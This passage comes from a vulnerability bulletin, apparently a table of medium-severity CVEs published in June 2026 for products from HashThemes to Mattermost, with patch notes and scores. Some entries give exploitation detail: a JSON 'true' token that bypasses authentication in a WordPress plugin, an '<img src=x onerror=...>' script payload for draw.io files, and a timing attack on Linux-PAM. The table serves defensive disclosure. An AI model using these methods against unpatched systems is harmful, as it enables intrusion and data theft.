| HashThemes--Hash Elements | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HashThemes Hash Elements allows Retrieve Embedded Sensitive Data. This issue affects Hash Elements: from n/a through 1.5.4. | 2026-06-12 | 4.3 | CVE-2026-24618 |
| Hedef Media Promotion Interactive Media Marketing Inc.--Related Marketing Cloud (RMC) | Authentication bypass by spoofing vulnerability in Hedef Media Promotion Interactive Media Marketing Inc. Related Marketing Cloud (RMC) allows Brute Force. This issue affects Related Marketing Cloud (RMC): through 12052026. | 2026-06-12 | 6.5 | CVE-2026-5792 |
| helpfulcrowd--Helpfulcrowd Product Reviews | The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the `helpfulcrowd_validate_token()` function using a loose comparison operator (`!=`) instead of a strict comparison (`!==`) when validating the `token` parameter, while the corresponding REST route `/wp-json/helpfulcrowd/v1/update-settings` is registered with a `permission_callback` of `__return_true`, making it reachable by unauthenticated users; submitting a JSON boolean `true` as the `token` value causes PHP's loose comparison to evaluate as equal to the non-empty base64-encoded secret string, bypassing the check entirely. This makes it possible for unauthenticated attackers to invoke `helpfulcrowd_settings_endpoint()` and write arbitrary attacker-controlled key-value pairs directly into the `helpfulcrowd_options` WordPress database option via `update_option()` without any sanitization or allowlist filtering, enabling full unauthenticated modification of the plugin's stored configuration. | 2026-06-09 | 5.3 | CVE-2026-8499 |
| helpstring--Global Body Mass Index Calculator | The Global Body Mass Index Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gbmicalc' shortcode in versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes in the GBMI_Calc_Widget::widget() function. Shortcode attributes are extracted directly into local variables via @extract($args) and then echoed unescaped into an HTML style attribute (height/width) and HTML body context (title), allowing attribute-breakout payloads. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8883 |
| Hepta Platforms--Heptabase | Heptabase developed by Hepta Platforms has an Exposed Dangerous Method or Function vulnerability, allowing unauthenticated remote attackers to leverage social engineering techniques to trick a victim into opening or loading a malicious webpage within the Heptabase application, thereby gaining unauthorized access to camera and microphone permissions. | 2026-06-12 | 6.5 | CVE-2026-12060 |
| hs-web--hsweb-framework | A vulnerability has been found in hs-web hsweb-framework up to 5.0.1. The affected element is the function denied of the file hsweb-system/hsweb-system-file/src/main/java/org/hswebframework/web/file/FileUploadProperties.java of the component File Upload. The manipulation of the argument filename leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 8009845b577d8a2c4bbf4fdd8e8913799a714be6. It is suggested to install a patch to address this issue. | 2026-06-08 | 6.3 | CVE-2026-11470 |
| hs-web--hsweb-framework | A vulnerability was detected in hs-web hsweb-framework up to 5.0.1. This affects the function OAuth2Client of the file hsweb-authorization/hsweb-authorization-oauth2/src/main/java/org/hswebframework/web/oauth2/server/OAuth2Client.java of the component OAuth2 Client. The manipulation results in open redirect. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as c2882679a9125cea52678151af5ae213cbd52579. Applying a patch is advised to resolve this issue. | 2026-06-08 | 4.3 | CVE-2026-11477 |
| Huawei--HarmonyOS | Permission management vulnerability in the network management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 6.3 | CVE-2026-41975 |
| Huawei--HarmonyOS | Permission control vulnerability in the audio framework. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 6.6 | CVE-2026-41976 |
| Huawei--HarmonyOS | Race condition vulnerability in the IPC module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 6.4 | CVE-2026-41982 |
| Huawei--HarmonyOS | Path traversal vulnerability in the SMS app. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.4 | CVE-2026-41972 |
| Huawei--HarmonyOS | Permission control vulnerability in calls. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.9 | CVE-2026-41973 |
| Huawei--HarmonyOS | DoS vulnerability in the log service. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5 | CVE-2026-41977 |
| Huawei--HarmonyOS | Permission control vulnerability in the print module. Impact: Successful exploitation of this vulnerability may affect integrity and confidentiality. | 2026-06-09 | 5.5 | CVE-2026-41979 |
| Huawei--HarmonyOS | Permission control vulnerability in the file preview module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 5.5 | CVE-2026-41980 |
| Huawei--HarmonyOS | Out-of-bounds write vulnerability in the IPC module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.3 | CVE-2026-41981 |
| Huawei--HarmonyOS | UAF vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 5.2 | CVE-2026-41984 |
| Huawei--HarmonyOS | UAF vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 5.1 | CVE-2026-41985 |
| Huawei--HarmonyOS | Permission control vulnerability in the clone module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 4.4 | CVE-2026-41978 |
| Huawei--HarmonyOS | DoS vulnerability in the browser kernel. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 4.3 | CVE-2026-41983 |
| hyperledger--fabric-chaincode-java | fabric-chaincode-java is a Java based implementation of Hyperledger Fabric chaincode shim APIs. From version 2.3.1 to before version 2.5.10, when chaincode is deployed in chaincode-as-a-service mode with TLS enabled, the chaincode server INFO level logging includes the TLS private key password in plaintext. An attacker with access to the chaincode server logs could recover the TLS private key password. If the attacker can also obtain the TLS private key, they could impersonate the chaincode server. This issue has been patched in version 2.5.10. | 2026-06-08 | 5.5 | CVE-2026-45581 |
| IBM--DevOps Plan | IBM DevOps Plan 3.0.0 through 3.0.6 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. | 2026-06-11 | 6.5 | CVE-2026-4096 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.0.0 through 1.9.2 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-06-11 | 5.4 | CVE-2026-3341 |
| IBM--Security QRadar EDR | IBM Security QRadar EDR 3.12 through 3.12.24 stores user credentials in plain text which can be read by a local privileged user. | 2026-06-11 | 4.1 | CVE-2024-45636 |
| IEI Integration Corp--iRM-TSi410X | The iRM-IEI Remote Management developed by IEI Integration Corp has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain partial system configuration information. | 2026-06-12 | 5.3 | CVE-2026-11848 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has an Arbitrary File Read vulnerability, allowing privileged remote attackers to access files outside the intended directory scope. | 2026-06-12 | 4.9 | CVE-2026-11844 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has a Path Traversal vulnerability, allowing authenticated remote attackers to exploit this vulnerability to create directories in unintended system paths. | 2026-06-12 | 4.3 | CVE-2026-11847 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2.23 and 6.9.13-48, a crafted MSL image can trigger a heap-use-after-free. Versions 7.1.2.23 and 6.9.13-48 fix the issue. | 2026-06-10 | 6.2 | CVE-2026-46523 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-23, due to a missing depth check a stack overflow can occur in the fx operation by passing a crafted argument. This issue has been patched in version 7.1.2-23. | 2026-06-10 | 6.2 | CVE-2026-46557 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-25, a crafted multi-frame image can result in a heap buffer over-write when encoding it with the SF3 encoder. This issue has been patched in version 7.1.2-25. | 2026-06-10 | 6.2 | CVE-2026-53465 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, when writing an IPTC output file a malicious input file could cause an out of bounds read of a single byte. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.1 | CVE-2026-42326 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, due to a missing check in the PSD decoder it would be possible to bypass the list-length resource policy when decoding a PSD image. Other security limits would still apply. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45031 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, an off by one in the meta encoder could result in an out of bounds read of a single byte in the meta encoder. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45358 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-22, an invalid connected-components:keep-top value could result in a heap buffer over-read when performing the connected components operation. This issue has been patched in versions 6.9.13-48 and 7.1.2-22. | 2026-06-10 | 5.7 | CVE-2026-45359 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, when performing a polynomial distortion an out of bounds over-read of 24 bytes can occur when specifying specific arguments. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.1 | CVE-2026-45624 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, because of a missing check in the MNG coder it would be possible to read more images than the list limit policy would allow resulting in excessive resource use. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45664 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, when using LZMA compression in the MIFF encoder an out of bounds write can occur due to a missing check. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 5.5 | CVE-2026-46521 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can cause a heap buffer over-read in the server process. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 5.7 | CVE-2026-47166 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-24, using the Floyd-Steinberg dithering method on an image with a mask causes a negative heap buffer over-write. This issue has been patched in version 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-48724 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-49 and 7.1.2-24, a crafted MVG file could result in a stack overflow due to a missing depth or visited-set check. This issue has been patched in versions 6.9.13-49 and 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-48734 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, a missing check of a return value could lead to a heap buffer over-write in the MAT decoder on 32-bit systems. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 5.9 | CVE-2026-48994 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, an incorrect parsing of the filename can result in a policy bypass and read files disallowed by a security policy using a symlink. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-49219 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, when an allocation fails in CheckPrimitiveExtent this can result in a heap-use-after-free and result in a crash. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 5.9 | CVE-2026-53462 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an incorrect check in the JP2 coder will result in a heap buffer over-write of a single byte when specifying certain options. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4 | CVE-2026-46559 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can cause a heap buffer over-write in the server process. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-46692 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can hijack a file descriptor in the server process when a race condition is met. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-46693 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, the distributed pixel cache was originally designed to operate without a challenge-response authentication model. This has been changed in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-47165 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-49 and 7.1.2-24, an infinite loop in the subimage-search operation can happen when using a crafted image. This issue has been patched in versions 6.9.13-49 and 7.1.2-24. | 2026-06-10 | 4.7 | CVE-2026-48733 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, when passing incorrect arguments in the distort operation a null pointer dereference will occur. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 4.3 | CVE-2026-53463 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-25, when providing invalid options to the wand option parser a small memory leak will occur. This issue has been patched in version 7.1.2-25. | 2026-06-10 | 4 | CVE-2026-53464 |
| imvks786--student_management_system | A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11532 |
| imvks786--student_management_system | A security vulnerability has been detected in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected by this vulnerability is an unknown functionality of the file /see.php of the component Student Deletion Endpoint. The manipulation of the argument del leads to improper authorization. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 5.4 | CVE-2026-11533 |
| itsourcecode--Hospital Management System | A vulnerability was detected in itsourcecode Hospital Management System 1.0. Impacted is an unknown function of the file /adminaccount.php. The manipulation of the argument Date results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11513 |
| itsourcecode--Hospital Management System | A flaw has been found in itsourcecode Hospital Management System 1.0. The affected element is an unknown function of the file /addpatient.php. This manipulation of the argument admissiontme causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-06-08 | 6.3 | CVE-2026-11514 |
| itsourcecode--Hospital Management System | A security vulnerability has been detected in itsourcecode Hospital Management System 1.0. This issue affects some unknown processing of the file /billing.php. The manipulation of the argument patientid leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 4.3 | CVE-2026-11512 |
| jasonpitts--WP Meta Sort Posts | The WP Meta Sort Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9. This is due to missing or incorrect nonce validation on the top-level included script in msp-options.php. This makes it possible for unauthenticated attackers to change the plugin's msp_loop_file and msp_nav_location settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8940 |
| jdm-labs--WP ApplicantStack Jobs Display | The WP ApplicantStack Jobs Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8882 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.1.0 and prior to version 1.2.5, a client with push access could push a tiny crafted thin pack (~174 bytes) whose delta header declares a huge dest_size. When dulwich ingested it via add_thin_pack / apply_delta, it would allocate hundreds of MB of memory based on that attacker-controlled size, with no relationship to the actual bytes received. Operators running a Dulwich-based Git server that exposes git-receive-pack (i.e. accepts pushes) - for example via dulwich.server functionality, the HTTP smart server, or anything built on ReceivePackHandler - are impacted. The issue is patched in 1.2.5. add_thin_pack now accepts a max_input_size keyword (bytes; 0/None = unlimited, matching git's semantics), and ReceivePackHandler reads receive.maxInputSize from the repository config and passes it through. Wire reads are counted and a PackInputTooLarge exception is raised once the cap is exceeded - equivalent to git index-pack --max-input-size. Users should upgrade to Dulwich 1.2.5 or later and set receive.maxInputSize in their server's repository config to a sane bound for their environment. On unpatched versions, receive.maxInputSize has no effect, so it cannot be used as a workaround. Until upgrading, operators should restrict dulwich-receive-pack (push) access to trusted, authenticated clients only, or disable it entirely on servers that only need to serve fetches and/or run the server under an OS-level memory limit (e.g. ulimit, cgroups/MemoryMax, or a container memory limit) so a malicious push is killed rather than taking down the host. | 2026-06-10 | 5.7 | CVE-2026-47734 |
| jflyfox--jfinal_cms | A vulnerability was identified in jflyfox jfinal_cms up to 5.1.0. This impacts the function list of the file AdvicefeedbackController.java. Such manipulation of the argument orderBy leads to sql injection. The attack can be launched remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11473 |
| jgraph--drawio | draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.12, a crafted .drawio file can execute arbitrary JavaScript in the editor's origin when the file is opened. The vulnerability is not in the label sanitizer (which works correctly on the rendering path) but in a feature-detection routine in the Text Format panel that reads the raw cell label and assigns it to a detached element's innerHTML without sanitization. Browsers fire onerror for failed image loads even on detached elements, so an <img src=x onerror=...> payload in any cell label triggers script execution as soon as the cell is selected - which import does automatically. This issue has been patched in version 29.7.12. | 2026-06-10 | 6.1 | CVE-2026-46642 |
| joshin85--Plugin Name: ePaperFlip Publisher | The ePaperFlip Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'publicationid' attribute of the `epaperflip_embed` shortcode in all versions up to, and including, 1. This is due to insufficient input sanitization and output escaping on the shortcode attribute which is injected directly into inline JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-7662 |
| kenz60--kk blog card | The kk blog card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'blog-card' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on the shortcode's 'href' and 'type' attributes, which are concatenated directly into HTML attribute contexts in the shortcode callback registered in kk-blog-card-shortcode.php. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8895 |
| koel--koel | Koel is a free, open-source music streaming solution. Prior to version 9.7.1, Koel contains a Server-Side Request Forgery (SSRF) vulnerability in the radio station creation endpoint (POST /api/radio/stations). The url field validation rules are declared without the bail keyword, so the HasAudioContentType rule - which issues HTTP requests to the supplied URL - still executes even after the SafeUrl rule has rejected the URL as pointing to a private/reserved address. Any authenticated, non-admin user can therefore coerce the server into making HEAD/GET requests to arbitrary internal hosts. This issue has been patched in version 9.7.1. | 2026-06-12 | 6.3 | CVE-2026-50552 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions prior to 0.47.2, a local privilege escalation vulnerability exists in kitty's file transmission protocol where a child process running in the terminal can write to arbitrary files on the filesystem by exploiting a TOCTOU (Time-of-Check-Time-of-Use) race condition between symlink validation and file creation. The `os.open()` call used to create files does not use `O_NOFOLLOW`, allowing an attacker to create a symlink between the initial stat check and the actual file open, causing the write to follow the symlink to an arbitrary destination. Version 0.47.2 fixes the issue. | 2026-06-12 | 5 | CVE-2026-54055 |
| Kushan2k--student-management-system | A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Manipulation of the argument nic can lead to SQL injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11475 |
| Kushan2k--student-management-system | A security vulnerability has been detected in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this issue is the function edit-admin of the file controllers/AdminController.php of the component Profile Update Endpoint. The manipulation of the argument isadmin leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11476 |
| Lenovo--Application | A vulnerability was identified in the Lenovo Android Application, distributed exclusively on tablets in the Chinese market, that could allow a website visited by the built-in browser to overwrite system clipboard contents. | 2026-06-10 | 4.3 | CVE-2026-7516 |
| Lenovo--X13 Gen 6 (Type 21RK, 21RL) Laptops (ThinkPad) BIOS | During an internal security assessment, a potential vulnerability was discovered in some ThinkPad embedded controller firmware that could allow a privileged local user to perform arbitrary reads or writes to privileged memory regions. | 2026-06-10 | 6.7 | CVE-2025-10237 |
| Lenovo--X13 Gen 6 (Type 21RK, 21RL) Laptops (ThinkPad) BIOS | During an internal security assessment, a potential out-of-bounds write vulnerability was discovered in the BIOS of some ThinkPad products that could allow a privileged local user to execute code in System Management Mode (SMM). | 2026-06-10 | 6.7 | CVE-2025-10238 |
| Linux-PAM--Linux-PAM | Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences. The comparison uses strncmp() (or strncasecmp() when PAM_ICASE_ARG is set) preceded by a length-equality check, so the time to reject a candidate depends on the index of the first differing byte and on whether the candidate's length matches the stored password, leaking the password length and individual prefix bytes. The vulnerable path is reached when the administrator configures pam_userdb with crypt=none, with an unrecognized crypt method, or without a crypt= argument, causing the module to store and compare credentials in plaintext. | 2026-06-14 | 5.9 | CVE-2026-54411 |
| lldpd--lldpd | lldpd is an implementation of IEEE 802.1ab (LLDP). Prior to version 1.0.22, lldpd_decode() in src/daemon/lldpd.c strips 802.1Q VLAN tags from received Ethernet frames by calling memmove() to shift the frame payload 4 bytes left. The third argument (byte count) is s - 2 * ETHER_ADDR_LEN but should be s - 2 * ETHER_ADDR_LEN - 4, causing a 4-byte heap buffer over-read past the malloc(h_mtu) allocation when the received frame size equals the interface MTU. This issue has been patched in version 1.0.22. | 2026-06-09 | 6.5 | CVE-2026-46433 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap out-of-bounds read exists in the Android Verified Boot (AVB) vbmeta image parser in NanaZip (via the upstream 7-Zip AvbHandler). An unsigned integer underflow in a bounds check allows an attacker-controlled value_num_bytes field to pass validation, causing AddNameToString to read up to ~4 GiB past the end of a 64 KiB heap buffer. This causes a deterministic crash (denial of service) when opening a crafted .avb or .img file. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 5.4 | CVE-2026-47222 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap out-of-bounds read exists in the Android Verified Boot (AVB) vbmeta image parser in NanaZip (via the upstream 7-Zip AvbHandler). A 32-bit unsigned integer overflow in the bounds check pos + ht.salt_len > descSize allows an attacker-controlled salt_len field to bypass validation, causing CByteBuffer::CopyFrom to memcpy up to ~4 GiB past the end of a 64. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 5.4 | CVE-2026-47223 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap buffer-overflow read exists in the LVM2 physical-volume metadata parser in NanaZip (via the upstream 7-Zip LvmHandler). The vulnerability is triggered when opening a crafted LVM disk image. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 4.3 | CVE-2026-47224 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #133, a normal authenticated user can edit another user's video subtitles because of a lack of authorization. They can upload subtitles, edit their name or delete them. This issue has been patched in version 5.5.3 - #133. | 2026-06-11 | 6.5 | CVE-2026-47238 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #141, ClipBucket v5 contains an improper neutralization of SQL wildcard characters in the subtitle editing endpoint. An authenticated user can send a % character as the number parameter to overwrite all subtitle titles of any video they own in a single HTTP request. This issue has been patched in version 5.5.3 - #141. | 2026-06-11 | 4.3 | CVE-2026-49482 |
| Magepeople inc.--WpEvently | Cross-Site request forgery (CSRF) vulnerability in Magepeople inc. WpEvently allows Cross Site Request Forgery. This issue affects WpEvently: from n/a through 4.1.2. | 2026-06-11 | 4.3 | CVE-2024-32110 |
| mailerpress--MailerPress Email Marketing, Newsletter, Email Automation & WooCommerce Emails | The MailerPress - Email Marketing, Newsletter, Email Automation & WooCommerce Emails plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Campaign HTML Content Field in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The public-facing campaign preview endpoint (/mp-email/{id}-slug/) is not affected by this vulnerability, as it applies a Content-Security-Policy header blocking all inline scripts; exploitation is limited to the admin dashboard preview. | 2026-06-09 | 6.4 | CVE-2026-8599 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, mbstream did not check for /../ in the path when unpacking the archive. A proper backup can never contain such paths, but a specially crafted archive could have caused mbstream to create files outside of the target-dir path. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 6.3 | CVE-2026-44171 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB allowed SELECT ... INTO OUTFILE and SELECT ... INTO DUMPFILE without verifying the FILE privilege if the FROM clause contained only subqueries. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 5 | CVE-2026-44173 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, a user getting EXECUTE access to a stored routine via a role, could see the routine definition even without SHOW CREATE ROUTINE privilege. This issue has been patched in versions 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 4.3 | CVE-2026-44169 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to require system-level permission when patching protected default system roles, which allows authenticated users with delegated user-management permissions to escalate privileges by altering built-in role permissions via the role patch API. Mattermost Advisory ID: MMSA-2026-00656 | 2026-06-12 | 6.7 | CVE-2026-6739 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the `manage_secure_connections` permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint. Mattermost Advisory ID: MMSA-2026-00662 | 2026-06-12 | 6.5 | CVE-2026-7184 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to validate that a username returned during bot registration belongs to a bot account, which allows an unprivileged attacker to intercept private messages sent by plugins via direct message channels by pre-registering a user account with a predictable plugin bot username. Mattermost Advisory ID: MMSA-2026-00649 | 2026-06-12 | 5.3 | CVE-2026-6046 |
